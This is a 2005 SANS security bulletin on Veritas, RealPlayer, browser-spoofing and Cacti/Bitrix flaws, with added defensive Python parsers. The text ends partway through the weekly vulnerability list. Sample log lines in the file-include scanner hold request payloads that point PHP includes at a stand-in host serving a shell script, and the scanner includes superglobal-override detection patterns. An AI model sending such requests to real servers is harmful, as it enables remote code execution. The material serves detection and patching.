RISK: The Consensus Security Vulnerability Alert Vol. 4 No. 25

From: The SANS Institute (ConsensusSecurityVulnerabilityAlertsans.org)
Date: Fri Jun 24 2005 - 11:25:29 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Four critical problems in Veritas backup products merit your immediate
attention if you use that popular software suite (#1 below). And on
both your children's computers and your own, if you use music and video
software from Real (#2 below), click on "Tools" or "Help" and choose
"Check for Updates" to get fixes to flaws in that software that could
allow Trojans to be placed on your computers.

Also, you have two more weeks to get the early registration discount for
SANS' largest Washington DC security training program (July 28 - August 3):
http://www.sans.org/washington2005

                                         Alan

*************************************************************************
           RISK: The Consensus Security Vulnerability Alert
June 24, 2005 Vol. 4. Week 25
*************************************************************************

RISK is the SANS community's consensus bulletin summarizing the most
important vulnerabilities and exploits identified during the past week
and providing guidance on appropriate actions to protect your systems
(PART I). It also includes a comprehensive list of all new
vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:
========================================================================
Platform # of Updates & Vulnerabilities
========================================================================
Other Microsoft Products 1
Third Party Windows Apps 6
Mac Os 1
Linux 4
Solaris 1
Unix 4
Cross Platform 12 (#1, #2, #3)
Web Application 30 (#4)
Network Device 3

********************** Sponsored by BindView ****************************

Access control challenges?

Have auditors asked who has access to your critical resources, how they
got access and for the business owners to sign off? They will. Find out
why this information is critical yet difficult to produce. Equally
important, find out how you quickly and easily create it. Download the
white paper "User and Group Entitlement Reporting"

https://ocp.bindview.com/Surveys/Main/EventMF.cfm?NUM=1412&AD=NS-AtRisLtrUsGrEnRWP-Q205

*************************************************************************

Table of Contents:

Part I -- Critical Vulnerabilities from TippingPoint, a division of 3Com
(www.tippingpoint.com)

Widely Deployed Software
(1) CRITICAL: Veritas Backup Software Multiple Vulnerabilities
(2) HIGH: RealNetworks RealPlayer Multiple Vulnerabilities
(3) LOW: Multiple Browsers Dialog Box Spoofing

Other Software
(4) HIGH: Cacti and Bitrix Remote File Include Vulnerabilities

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from
Qualys (www.qualys.com)

 -- Other Microsoft Products
05.25.1 - Internet Explorer Dialog Box Origin Spoofing
 -- Third Party Windows Apps
05.25.2 - Veritas Backup Exec/NetBackup Request Packet Denial Of Service
05.25.3 - Veritas Backup Exec Remote Agent Null Pointer Dereference Denial Of Service
05.25.4 - Veritas Backup Exec Remote Agent Servers Privilege Escalation
05.25.5 - Veritas Backup Exec Server Remote Registry Access
05.25.6 - Veritas Backup Exec Admin Plus Pack Remote Heap Overflow
05.25.7 - RealVNC Server Remote Information Disclosure
 -- Mac Os
05.25.8 - Safari Dialog Box Origin Spoofing
 -- Linux
05.25.9 - Asterisk Manager Interface Command Processing Remote Buffer Overflow
05.25.10 - Ruby XMLRPC Server Command Execution
05.25.11 - Vipul Razor-agents Multiple Unspecified Denial of Service Vulnerabilities
05.25.12 - SuSE Linux GPG2 S/MIME Signing Unspecified Vulnerability
 -- Solaris
05.25.13 - Sun ONE/iPlanet Messaging Server Webmail HTML Injection
 -- Unix
05.25.14 - NanoBlogger Arbitrary Command Execution
05.25.15 - Heimdal TelnetD Remote Buffer Overflow
05.25.16 - Yaws Source Code Disclosure
05.25.17 - SpamAssassin Malformed Email Header Remote Denial of Service
 -- Cross Platform
05.25.18 - Slim Browser Dialog Box Origin Spoofing Vulnerability
05.25.19 - Veritas Backup Exec Remote Agent Authentication Buffer Overflow
05.25.20 - Veritas Backup Exec Web Administration Console Remote Buffer Overflow
05.25.21 - Avant Browser Dialog Box Origin Spoofing
05.25.22 - Tor Arbitrary Memory Information Disclosure
05.25.23 - Mozilla Firefox Dialog Box Origin Spoofing
05.25.24 - Opera Web Browser Dialog Box Origin Spoofing Vulnerability
05.25.25 - iCab Web Browser Dialog Box Origin Spoofing Vulnerability
05.25.26 - JBoss Malformed HTTP Request Remote Information Disclosure
05.25.27 - Bitrix Site Manager Remote File Include
05.25.28 - Opera XMLHttpRequest Object Cross-Domain Access
05.25.29 - Opera Cross-Site Scripting and Local File Disclosure
 -- Web Application
05.25.30 - DUclassmate Multiple SQL Injection Vulnerabilities
05.25.31 - DUpaypal Pro SQL Injection
05.25.32 - DUamazon Pro Multiple SQL Injection Vulnerabilities
05.25.33 - RaXnet Cacti SQL Injection
05.25.34 - Moodle Unspecified Text Filtering Vulnerability
05.25.35 - RaXnet Cacti Config_Settings.PHP Remote File Include
05.25.36 - RaXnet Cacti Remote File Include
05.25.37 - MercuryBoard Index.PHP Remote SQL Injection
05.25.38 - Moodle Teacher Privilege Escalation
05.25.39 - i-Gallery Folder Argument Cross-Site Scripting
05.25.40 - Fortibus CMS SQL Injection
05.25.41 - cPanel User Parameter Cross-Site Scripting
05.25.42 - LaGarde StoreFront Shopping Cart LOGIN.ASP SQL Injection
05.25.43 - paFaq Database Unauthorized Access
05.25.44 - paFaq Question Cross-Site Scripting
05.25.45 - paFaq Administrator Username SQL Injection
05.25.46 - i-Gallery Directory Traversal
05.25.47 - Contelligent Preview Privilege Escalation
05.25.48 - Trac Unauthorized File Upload/Download Vulnerability
05.25.49 - Uapplication Ublog Reload Multiple SQL Injection Vulnerabilities
05.25.50 - Ublog Reload Trackback.ASP Cross-Site Scripting
05.25.51 - osCommerce Multiple HTTP Response Splitting Vulnerabilities
05.25.52 - XAMMP Lang.PHP HTML Injection
05.25.53 - XAMMP Lang.PHP Directory Traversal Vulnerability
05.25.54 - ATutor Multiple Cross-Site Scripting Vulnerabilities
05.25.55 - Cool Cafe Chat LOGIN.ASP SQL Injection
05.25.56 - e107 Website System Multiple Input Validation and Information Disclosure Vulnerabilities
05.25.57 - Ultimate PHP Board Weak Password Encryption
05.25.58 - Ultimate PHP Board Multiple Cross-Site Scripting Vulnerabilities
05.25.59 - SquirrelMail Multiple Unspecified Cross-Site Scripting Vulnerabilities
 -- Network Device
05.25.60 - Enterasys Networks Vertical Horizon Default Backdoor Account Vulnerability
05.25.61 - Enterasys Networks Vertical Horizon Remote Denial of Service
05.25.62 - Cisco VPN Concentrator Groupname Enumeration Weakness

************************* Sponsored Links *******************************

1) Hacking Web Applications- FREE White Paper from SPI Dynamics
http://www.sans.org/info.php?id=808

2) The deadline is next week for the only opportunity to have SANS
instructors delivering live classes on-line at your workplace and at
home. You can still sign up for SANS exclusive training program for
CISSP, even though it started Wednesday. The others (Forensics,
Auditing, Hacker Techniques, Security Essentials, and more) start in the
next few weeks.
http://www.sans.org (see SANSHome)

*************************************************************************

PART I Critical Vulnerabilities

Part I is compiled by Rohit Dhamankar (rohitd_at_tippingpoint.com) at
TippingPoint, a division of 3Com, as a by-product of that company's
continuous effort to ensure that its intrusion prevention products
effectively block exploits using known vulnerabilities. TippingPoint's
analysis is complemented by input from a council of security managers
from twelve large organizations who confidentially share with SANS the
specific actions they have taken to protect their systems. A detailed
description of the process may be found at
http://www.sans.org/newsletters/cva/#process
Archives at http://www.sans.org/newsletters/risk
  
************************
Widely Deployed Software
************************

(1) CRITICAL: Veritas Backup Software Multiple Vulnerabilities
Affected:
Backup Exec 10.0 for Windows Servers rev. 5484
Backup Exec 9.1 for Windows Servers rev. 4691
Backup Exec 9.0 for Windows Servers rev. 4454 and 4367
Backup Exec 9.1.307/306/1154/1152.4/1152 /1151.1/1127.1/1067.3/1067.2 for NetWare Servers
Backup Exec 9.0.4202 /4174/4172/4170 /4019 for NetWare Servers

Description: Veritas Backup Exec is a backup and restore solution for
Windows and NetWare server environments. This software contains the
following vulnerabilities:

(a) The Backup Agent is installed on every server system that is backed
up. The agent, which listens on port 10000/tcp by default, speaks the
Network Data Management Protocol (NDMP), and client authentication is
carried out over NDMP. The implementation of the NDMP Windows client
authentication method contains a buffer overflow that is triggered by an
overlong password. Because authentication happens before any credential
is checked, the overflow is reachable by an unauthenticated attacker and
can be exploited to execute arbitrary code with the privileges of the
Backup Agent process, typically domain administrator. The discoverers
have posted complete technical details for this flaw.

(b) The Backup Exec Web Administration Console (BEWAC) allows remote
administration of the media server (the server that is connected to the
storage devices and is running the Veritas Backup Engine) via HTTP. The
BEWAC runs on port 8099/tcp by default. The Windows installation of
BEWAC is reported to contain a buffer overflow that can be exploited to
execute arbitrary code. The discoverers plan to post the technical
details for this flaw in another 3 months.

(c) The Admin Plus Pack Option (introduced in version 9.0 for Windows
servers) and the Centralized Admin Server Option allow easy management
of multiple backup servers. Such configurations contain a heap-based
overflow in the Backup Exec server that can be exploited to execute
arbitrary code. The discoverers plan to post the technical details for
this flaw in another 3 months. They have also reported that version 10.x
is vulnerable even if the Admin Plus Pack Option has not been installed.

(d) Backup Exec on Windows runs an RPC service listening on port
6106/tcp that allows remote registry access. This service does not
check for any user credentials. As a result, any unauthenticated
attacker can bind to this service and change registry settings with
"Administrator" privileges, which can lead to a complete compromise of
the system. The details of how to craft a malicious RPC request have
been publicly posted.

(e) The Backup Agent also contains denial-of-service vulnerabilities
that can be triggered by request packets containing "Error Status"
values other than 0 or other specially crafted requests.
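
The two agent-side trigger conditions above, a non-zero error status in a
request and an overlong password in a client-authentication request, can be
checked on traffic captured from port 10000/tcp with a small decoder. The
following Python is an added example, not code from the advisories or from
Veritas: it decodes the XDR record mark and the 24-byte NDMP header as laid
out in the public NDMP specification, then inspects CONNECT_CLIENT_AUTH
bodies. It assumes the standard NDMP_AUTH_TEXT layout; the bulletin does not
say whether Backup Exec's Windows client authentication method uses that
layout or a vendor-specific one, and the 64-byte password threshold is an
arbitrary choice for illustration. The sample records are constructed, not
captured.

```python
"""
Inspect NDMP request records for the two trigger conditions described in
the bulletin: a request whose error field is non-zero, and a text-auth
request whose password is implausibly long. Constants are from the public
NDMP v3/v4 specification; MAX_PASSWORD_LEN is an assumption (not a figure
from any advisory).
"""
import struct

NDMP_HEADER_LEN = 24          # sequence, time_stamp, message_type, message, reply_sequence, error
NDMP_MESSAGE_REQUEST = 0      # message_type value for requests (1 = reply)
NDMP_CONNECT_CLIENT_AUTH = 0x901
NDMP_NO_ERR = 0
NDMP_AUTH_TEXT = 1            # auth_type: 0 = none, 1 = text, 2 = md5
MAX_PASSWORD_LEN = 64         # assumed sane upper bound; tune to your environment


def xdr_string(buf, off):
    """Decode an XDR string (u32 length, bytes, padded to 4); return (value, new_offset)."""
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    if n > len(buf) - off:
        raise ValueError("XDR string length exceeds buffer")
    return buf[off:off + n], off + n + (-n % 4)


def parse_ndmp_record(data):
    """Strip the XDR record mark (high bit = last fragment) and decode the NDMP header."""
    (mark,) = struct.unpack_from(">I", data, 0)
    frag = data[4:4 + (mark & 0x7FFFFFFF)]
    if len(frag) < NDMP_HEADER_LEN:
        raise ValueError("short NDMP fragment")
    seq, ts, mtype, msg, rseq, err = struct.unpack_from(">6I", frag, 0)
    hdr = {"sequence": seq, "message_type": mtype, "message": msg,
           "reply_sequence": rseq, "error": err}
    return hdr, frag[NDMP_HEADER_LEN:]


def inspect_ndmp_request(data):
    """Return a list of findings for one NDMP record (empty if nothing suspicious)."""
    findings = []
    hdr, body = parse_ndmp_record(data)
    if hdr["message_type"] != NDMP_MESSAGE_REQUEST:
        return findings                       # only requests are of interest here
    if hdr["error"] != NDMP_NO_ERR:
        findings.append("request carries non-zero error status %d" % hdr["error"])
    if hdr["message"] == NDMP_CONNECT_CLIENT_AUTH and len(body) >= 4:
        (auth_type,) = struct.unpack_from(">I", body, 0)
        if auth_type == NDMP_AUTH_TEXT:       # assumption: text auth; vendor methods may differ
            user, off = xdr_string(body, 4)
            password, _ = xdr_string(body, off)
            if len(password) > MAX_PASSWORD_LEN:
                findings.append("CONNECT_CLIENT_AUTH password of %d bytes for user %r"
                                % (len(password), user.decode(errors="replace")))
    return findings


# --- helpers used only to construct sample records ---------------------------

def encode_xdr_string(s):
    return struct.pack(">I", len(s)) + s + b"\x00" * (-len(s) % 4)


def auth_text_body(user, password):
    return struct.pack(">I", NDMP_AUTH_TEXT) + encode_xdr_string(user) + encode_xdr_string(password)


def build_ndmp_request(message, error, body=b"", sequence=1):
    """Encode a request record with the given message code and error field."""
    hdr = struct.pack(">6I", sequence, 0, NDMP_MESSAGE_REQUEST, message, 0, error)
    frag = hdr + body
    return struct.pack(">I", 0x80000000 | len(frag)) + frag


if __name__ == "__main__":
    # Constructed samples, not captured traffic
    samples = {
        "benign":     build_ndmp_request(NDMP_CONNECT_CLIENT_AUTH, NDMP_NO_ERR, auth_text_body(b"backup", b"s3cret")),
        "overlong":   build_ndmp_request(NDMP_CONNECT_CLIENT_AUTH, NDMP_NO_ERR, auth_text_body(b"backup", b"A" * 1024)),
        "bad_status": build_ndmp_request(NDMP_CONNECT_CLIENT_AUTH, 3, auth_text_body(b"backup", b"x")),
    }
    for name, rec in samples.items():
        print(name, inspect_ndmp_request(rec) or "clean")
```

Run it against a pcap by handing each reassembled TCP payload to
inspect_ndmp_request; a finding on a record that precedes an agent crash or
a new outbound connection from the backed-up host is worth treating as an
exploitation attempt rather than a malformed client.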

Status: Veritas has released fixes which should be applied immediately.
A workaround is to block the ports associated with the Veritas agent and
server services (10000/tcp, 8099/tcp, 6106/tcp, etc.) at the network
perimeter. Perimeter filtering does not protect against an attacker who
is already inside the network, and every backed-up server runs the
agent, so filtering is a stopgap, not a substitute for patching. Note
that another buffer overflow vulnerability disclosed in the Backup Agent
in December 2004 was widely exploited.

Council Site Actions: Two of the council sites are already in the
process of patching their systems. One site plans to patch during their
next regularly scheduled system update process. Three other council
sites are still in the process of assessing the risk and developing a
remediation plan. They commented that they will most likely treat this
as a high risk. One site commented that they are scanning their network
on ports 8099/tcp and 10000/tcp to gather more information about the
affected machine population.

References:
Veritas Advisories
http://seer.support.veritas.com/docs/276604.htm
http://seer.support.veritas.com/docs/276605.htm
http://seer.support.veritas.com/docs/276606.htm
http://seer.support.veritas.com/docs/276533.htm
http://seer.support.veritas.com/docs/276607.htm
http://seer.support.veritas.com/docs/277485.htm
iDefense Advisories
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0073.html
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0074.html
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0075.html
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0076.html
Postings by NGSSoftware
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0069.html
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0070.html
NDMP Protocol Details
http://www.ndmp.org/info/overview.shtml
Backup Exec Homepage and Administrator Guide
http://veritas.com/Products/www?c=product&refId=57
http://ftp.support.veritas.com/pub/support/products/Backup_Exec_for_WindowsNT/269777.pdf
SecurityFocus BIDs
http://www.securityfocus.com/bid/14020
http://www.securityfocus.com/bid/14021
http://www.securityfocus.com/bid/14022
http://www.securityfocus.com/bid/14023
http://www.securityfocus.com/bid/14025

****************************************************************

(2) HIGH: RealNetworks RealPlayer Multiple Vulnerabilities
Affected:
On Windows:
RealPlayer 10.5 (6.0.12.1040-1069)
RealPlayer 8/10
RealOne Player v2/v1
RealPlayer Enterprise
Rhapsody 3 (build 0.815-0.1006)
On Mac OS:
Mac RealPlayer 10 (10.0.0.305-331)
Mac RealOne Player
On Linux:
Linux RealPlayer 10 (10.0.0-4)
Helix Player (10.0.0-4)

Description: RealNetworks' various media players contain the following
vulnerabilities that can be exploited by a malicious webpage or an HTML
email to compromise a client system.

(a) A specially crafted AVI movie file triggers a heap-based overflow
that can be exploited to execute arbitrary code. The problem arises when
the "stream format chunk (strf)" size in an AVI file is greater than
1064 bytes.

(b) A specially crafted RealMedia file with RealText also triggers a
heap-based overflow that can be exploited to execute arbitrary code. The
problem arises when the size of the RealText data exceeds 256 bytes.

(c) A specially crafted MP3 file can overwrite a local file or lead to
execution of an ActiveX control on the client system. This can be
exploited to install malware on client systems. The technical details
required to leverage this flaw have not been posted yet.

Note that systems with RealPlayer configured as the default media player
are at a greater risk as the malicious media files may be opened without
any user prompting.
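
A gateway or mail filter can reject AVI files that meet the strf condition
in (a) without needing RealPlayer to open them. The following Python is an
added example, not code from RealNetworks or eEye: it walks the RIFF chunk
tree of an AVI file (the layout is Microsoft's public AVI format) and
reports any stream format chunk whose declared size exceeds 1064 bytes. It
also refuses files whose chunk sizes overrun the buffer, since a size field
that lies about the data that follows is itself a common trigger for parser
bugs. The AVI skeletons it checks are constructed inline and contain no
real media.

```python
"""
Scan an AVI (RIFF) file for 'strf' chunks larger than the 1064-byte
threshold given in the advisory. Added example; the RIFF/AVI layout is
from the public format documentation, sample files are built inline.
"""
import struct

STRF_LIMIT = 1064  # threshold from the advisory text above


def iter_chunks(buf, start, end):
    """Yield (fourcc, list_type, data_offset, size) for each chunk in buf[start:end]."""
    off = start
    while off + 8 <= end:
        fourcc, size = struct.unpack_from("<4sI", buf, off)   # RIFF is little-endian
        data = off + 8
        if data + size > end:
            raise ValueError("chunk %r at offset %d overruns its parent" % (fourcc, off))
        list_type = buf[data:data + 4] if fourcc in (b"RIFF", b"LIST") else None
        yield fourcc, list_type, data, size
        off = data + size + (size & 1)                         # chunks are word-aligned


def find_oversized_strf(buf):
    """Return [(chunk_offset, size), ...] for every strf chunk larger than STRF_LIMIT."""
    if buf[:4] != b"RIFF" or buf[8:12] != b"AVI ":
        raise ValueError("not an AVI file")
    hits = []

    def walk(start, end):
        for fourcc, list_type, data, size in iter_chunks(buf, start, end):
            if fourcc in (b"RIFF", b"LIST"):
                walk(data + 4, data + size)                    # skip the 4-byte list type
            elif fourcc == b"strf" and size > STRF_LIMIT:
                hits.append((data - 8, size))

    walk(0, len(buf))
    return hits


# --- helpers used only to construct sample files -----------------------------

def chunk(fourcc, payload):
    pad = b"\x00" if len(payload) & 1 else b""
    return fourcc + struct.pack("<I", len(payload)) + payload + pad


def lst(list_type, payload):
    return chunk(b"LIST", list_type + payload)


def make_avi(strf_len):
    """Minimal AVI skeleton with one video stream whose strf chunk is strf_len bytes."""
    strh = chunk(b"strh", b"vids" + b"\x00" * 52)              # 56-byte stream header
    strf = chunk(b"strf", b"\x00" * strf_len)                  # stream format (BITMAPINFOHEADER + extra)
    hdrl = lst(b"hdrl", chunk(b"avih", b"\x00" * 56) + lst(b"strl", strh + strf))
    movi = lst(b"movi", chunk(b"00dc", b"\x00" * 16))
    return chunk(b"RIFF", b"AVI " + hdrl + movi)


if __name__ == "__main__":
    print("normal  :", find_oversized_strf(make_avi(40)))     # BITMAPINFOHEADER-sized strf
    print("oversize:", find_oversized_strf(make_avi(4096)))   # exceeds the 1064-byte limit
```

A real BITMAPINFOHEADER is 40 bytes and even codecs with large private
extra data stay well under the limit, so the rule produces few false
positives; files that fail the overrun check should be quarantined rather
than passed on, because a downstream player will parse them just as
trustingly.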

Status: RealNetworks has released updates for all the vulnerabilities.
Users should be advised to upgrade their player by clicking "Tools" or
"Help" menu and then choosing "Check For Updates".

References:
RealNetworks Advisory
http://service.real.com/help/faq/security/050623_player/EN/
eEye Advisory
http://www.eeye.com/html/research/advisories/AD20050623.html
iDefense Advisory
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0077.html
AVI File Format
http://msdn.microsoft.com/library/en-us/wcemultimedia5/html/wce50conAVIMainHeader.asp
RealText Reference
http://service.real.com/help/library/guides/realtext/htmfiles/intro.htm
SecurityFocus BIDs
http://www.securityfocus.com/bid/13530

***********************************************************************

(3) LOW: Multiple Browsers Dialog Box Spoofing
Affected:
Internet Explorer, Mozilla, Opera, Safari, Firefox

Description: This vulnerability in multiple browsers may allow an
attacker to steal sensitive information from users and conduct phishing
attacks. The problem arises because a dialog box opened by JavaScript
does not indicate which website it belongs to. An attacker can therefore
craft a webpage that opens a trusted site in one window and, on top of
it, a dialog box whose input is sent to the attacker's site, and ask the
user to enter information in that dialog box. Secunia has posted proof
of concept code.

Status: Users should be advised to enter information only in forms
supplied by the original site and not in any dialog boxes.

Council Site Actions: All of the reporting council sites are waiting on
confirmation and patches from the vendors. They will most likely deploy
the patch during one of their regularly scheduled system update
processes.

References:
Secunia Advisory
http://secunia.com/secunia_research/2005-9/advisory/
SecurityFocus BIDs
http://www.securityfocus.com/bid/14007
http://www.securityfocus.com/bid/14008
http://www.securityfocus.com/bid/14009
http://www.securityfocus.com/bid/14010
http://www.securityfocus.com/bid/14011
http://www.securityfocus.com/bid/14012

****************************************************************

************************
Other Software
************************

(4) HIGH: Cacti and Bitrix Remote File Include Vulnerabilities
Affected:
Cacti, a PHP-based network graphing front end for RRDtool, version 0.8.6d and prior
Bitrix Site Manager, a content management system, version 4.0.5 and prior

Description: The following software packages reportedly contain PHP
remote file include vulnerabilities: Cacti and Bitrix Site Manager.
These flaws can be exploited by a remote attacker to run arbitrary PHP
code on the webserver hosting the vulnerable software packages. The
postings show how to craft the malicious HTTP requests to exploit the
flaws.
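
Attempts against both packages leave a recognizable trace in the web
server log: a query parameter that carries a full URL (the remote file to
include), or one that tries to set a PHP superglobal such as
_SERVER[DOCUMENT_ROOT], the Bitrix vector listed in Part II. The following
Python is an added example, not code from either vendor or from iDefense:
it parses Apache combined-format log lines and flags such parameters. The
log lines are constructed; the paths and the Cacti parameter name in them
are placeholders for the sample, not the real ones from the advisories.

```python
"""
Flag remote-file-include attempts in Apache combined-format logs.
Added example; SAMPLE_LOG is constructed and its paths/parameter
names are placeholders.
"""
import re
from urllib.parse import urlsplit, parse_qsl

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# A value that names a remote resource is the classic include() payload.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Parameter names a client should never be allowed to supply; they only take
# effect when register_globals is on. _SERVER is the Bitrix case from Part II;
# the others are assumed common targets, not ones named in this bulletin.
SUPERGLOBAL_RE = re.compile(r'^_?(SERVER|GLOBALS|ENV|SESSION|REQUEST)\b', re.I)


def classify_request(target):
    """Return the reasons a request target looks like an RFI attempt ([] if none)."""
    reasons = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if SUPERGLOBAL_RE.match(name):
            reasons.append("client-supplied superglobal %s" % name)
        if value.strip().lower().startswith(REMOTE_SCHEMES):   # parse_qsl already %-decoded it
            reasons.append("remote URL in parameter %s" % name)
    return reasons


def scan_log(lines):
    """Yield (client_ip, target, reasons) for each log line that looks like an RFI attempt."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m.group("target"))
        if reasons:
            yield m.group("ip"), m.group("target"), reasons


# Constructed sample lines (placeholder paths and parameter names).
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Jun/2005:10:01:02 -0500] "GET /cacti/graph_view.php?action=tree HTTP/1.1" 200 5120',
    '192.0.2.44 - - [24/Jun/2005:10:01:09 -0500] "GET /cacti/include/config_settings.php?inc=http%3A%2F%2F192.0.2.99%2Fsh.txt%3F HTTP/1.0" 200 312',
    '192.0.2.44 - - [24/Jun/2005:10:01:15 -0500] "GET /start.php?_SERVER[DOCUMENT_ROOT]=http://192.0.2.99/ HTTP/1.0" 200 99',
    '10.0.0.7 - - [24/Jun/2005:10:02:00 -0500] "POST /login.php HTTP/1.1" 302 -',
]

if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, target, "; ".join(reasons))
```

A 200 status on a flagged line does not mean the include succeeded, and
POST bodies are not in the access log at all, so treat a hit as a reason to
pull the PHP error log and check outbound connections from the web server
to the host named in the URL.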

Status:
Cacti - Upgrade to version 0.8.6e
Bitrix Site Manager - Upgrade to version 4.0.9

References:
Cacti
iDefense Advisories
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0066.html
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0067.html
Vendor Homepage
http://www.cacti.net
SecurityFocus BID
http://www.securityfocus.com/bid/14028
Bitrix Site Manager
Posting by D_Bug
http://archives.neohapsis.com/archives/bugtraq/2005-06/0119.html
Vendor Homepage
http://www.bitrixsoft.com/
SecurityFocus BID
http://www.securityfocus.com/bid/13965

**********************************************************************

Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 25, 2005

This list is compiled by Qualys ( www.qualys.com ) as part of that
company's ongoing effort to ensure its vulnerability management web
service tests for all known vulnerabilities that can be scanned. As of
this week Qualys scans for 4389 unique vulnerabilities. For this
special SANS community listing, Qualys also includes vulnerabilities
that cannot be scanned remotely.

______________________________________________________________________

05.25.1 CVE: Not Available
Platform: Other Microsoft Products
Title: Internet Explorer Dialog Box Origin Spoofing
Description: Microsoft Internet Explorer is vulnerable to a dialog box
origin spoofing issue. A remote attacker may be able to display a
spoofed dialog box to a user that seemingly originates from a trusted
site to carry out phishing style attacks.
All currently supported versions of Internet Explorer are vulnerable.
Ref: http://www.microsoft.com/technet/security/advisory/902333.mspx
______________________________________________________________________

05.25.2 CVE: CAN-2005-0772
Platform: Third Party Windows Apps
Title: Veritas Backup Exec/NetBackup Request Packet Denial Of Service
Description: Veritas Backup Exec and NetBackup for NetWare Media
Servers are vulnerable to a denial of service issue due to improper
handling of a malformed request packet. A remote attacker could
leverage this issue to cause a denial of service on a vulnerable
machine. Please refer to the link for a list of vulnerable versions.
Ref: http://seer.support.veritas.com/docs/276533.htm
______________________________________________________________________

05.25.3 CVE: CAN-2005-0772
Platform: Third Party Windows Apps
Title: Veritas Backup Exec Remote Agent Null Pointer Dereference
Denial Of Service
Description: Veritas Backup Exec Remote Agent is prone to a remotely
exploitable denial of service vulnerability. This could cause a denial
of service on the computer hosting the application. In particular, a
malformed request may cause a null pointer dereference in the
application. This could impact availability of the service and the
computer hosting the application.
Ref: http://seer.support.veritas.com/docs/276533.htm
______________________________________________________________________

05.25.4 CVE: Not Available
Platform: Third Party Windows Apps
Title: Veritas Backup Exec Remote Agent Servers Privilege Escalation
Description: Veritas Backup Exec is a network enabled backup solution
from Veritas. It is affected by a privilege escalation vulnerability.
This issue can allow remote users to gain elevated privileges and
completely compromise an affected computer. Veritas Software Backup
Exec version 10.0 rev.5520 has been released to fix the issue.
Ref: http://www.securityfocus.com/bid/14026
______________________________________________________________________

05.25.5 CVE: CAN-2005-0771
Platform: Third Party Windows Apps
Title: Veritas Backup Exec Server Remote Registry Access
Description: Veritas Backup Exec is a network enabled backup solution
from Veritas. The Windows version is prone to an access validation
vulnerability which may be leveraged by a remote attacker to gain
"Administrator" access to the vulnerable computer's registry. Veritas
Software Backup Exec version 10.0 rev.5520 has been released to fix
the issue.
Ref: http://www.securityfocus.com/bid/14020
______________________________________________________________________

05.25.6 CVE: Not Available
Platform: Third Party Windows Apps
Title: Veritas Backup Exec Admin Plus Pack Remote Heap Overflow
Description: Veritas Backup Exec is a network enabled backup solution
from Veritas. Veritas Backup Exec is affected by a remote heap
overflow vulnerability. This issue affects Backup Exec running on
Microsoft Windows platforms. Veritas Backup Exec versions 10.0 rev.
5484 SP1 and earlier are known to be vulnerable.
Ref: http://seer.support.veritas.com/docs/276607.htm
______________________________________________________________________

05.25.7 CVE: Not Available
Platform: Third Party Windows Apps
Title: RealVNC Server Remote Information Disclosure
Description: RealVNC (Virtual Network Computing) allows users to
access remote computers for administration purposes. RealVNC is
affected by a remote information disclosure vulnerability. Reports
indicate that scanning TCP port 5900 using the DFind tool reveals
sensitive information such as RealVNC version and the underlying
operating system. This information may aid in other attacks against an
affected computer.
Ref: http://www.realvnc.com/pipermail/vnc-list/2005-June/051336.html
______________________________________________________________________

05.25.8 CVE: Not Available
Platform: Mac Os
Title: Safari Dialog Box Origin Spoofing
Description: Apple Safari is a web browser. It is vulnerable to a dialog
box origin spoofing issue: a dialog box raised by an inactive window can
appear in front of another, active window, so the user cannot tell which
site it belongs to. Apple Safari versions 1.3 and earlier are vulnerable.
Ref: http://secunia.com/secunia_research/2005-12/advisory/
______________________________________________________________________

05.25.9 CVE: Not Available
Platform: Linux
Title: Asterisk Manager Interface Command Processing Remote Buffer
Overflow
Description: Asterisk is a software-based PBX system. It is reported
to be vulnerable to a remote buffer overflow issue due to improper
boundary checks performed by command line interface processing
routines. Asterisk version 1.0.7 is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14031
______________________________________________________________________

05.25.10 CVE: CAN-2005-1992
Platform: Linux
Title: Ruby XMLRPC Server Command Execution
Description: Ruby is an object-oriented scripting language. It is
vulnerable to an unspecified command execution issue. The XMLRPC
server in utils.rb for the ruby library (libruby) sets an invalid
default value that prevents "security protection". Ruby version 1.8.2
is vulnerable.
Ref: http://www.securityfocus.com/advisories/8719
http://www.securityfocus.com/advisories/8718
______________________________________________________________________

05.25.11 CVE: CAN-2005-1266
Platform: Linux
Title: Vipul Razor-agents Multiple Unspecified Denial of Service
Vulnerabilities
Description: Vipul Razor is a distributed spam detection and filtering
network. Vipul Razor-agents is affected by multiple unspecified denial
of service vulnerabilities. Vipul Razor versions 2.72 and earlier are
known to be vulnerable.
Ref: http://www.securityfocus.com/advisories/8715
______________________________________________________________________

05.25.12 CVE: CAN-2005-2023
Platform: Linux
Title: SuSE Linux GPG2 S/MIME Signing Unspecified Vulnerability
Description: SuSE Linux is affected by an unspecified vulnerability
related to S/MIME signing using gpg2. The cause and impact of this
issue are currently unknown, but it is likely to be remotely
exploitable. SuSE Linux version 9.3 is vulnerable.
Ref: http://www.securityfocus.com/advisories/8709
______________________________________________________________________

05.25.13 CVE: CAN-2005-2022
Platform: Solaris
Title: Sun ONE/iPlanet Messaging Server Webmail HTML Injection
Description: Sun ONE/iPlanet Messaging Server Webmail is vulnerable to
an HTML injection issue, affecting users who access webmail with
Internet Explorer, due to insufficient sanitization of HTML and script
code. Sun ONE Messaging Server version 6.2 and Sun iPlanet Messaging
Server 5.2 are vulnerable.
Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-101770-1

______________________________________________________________________

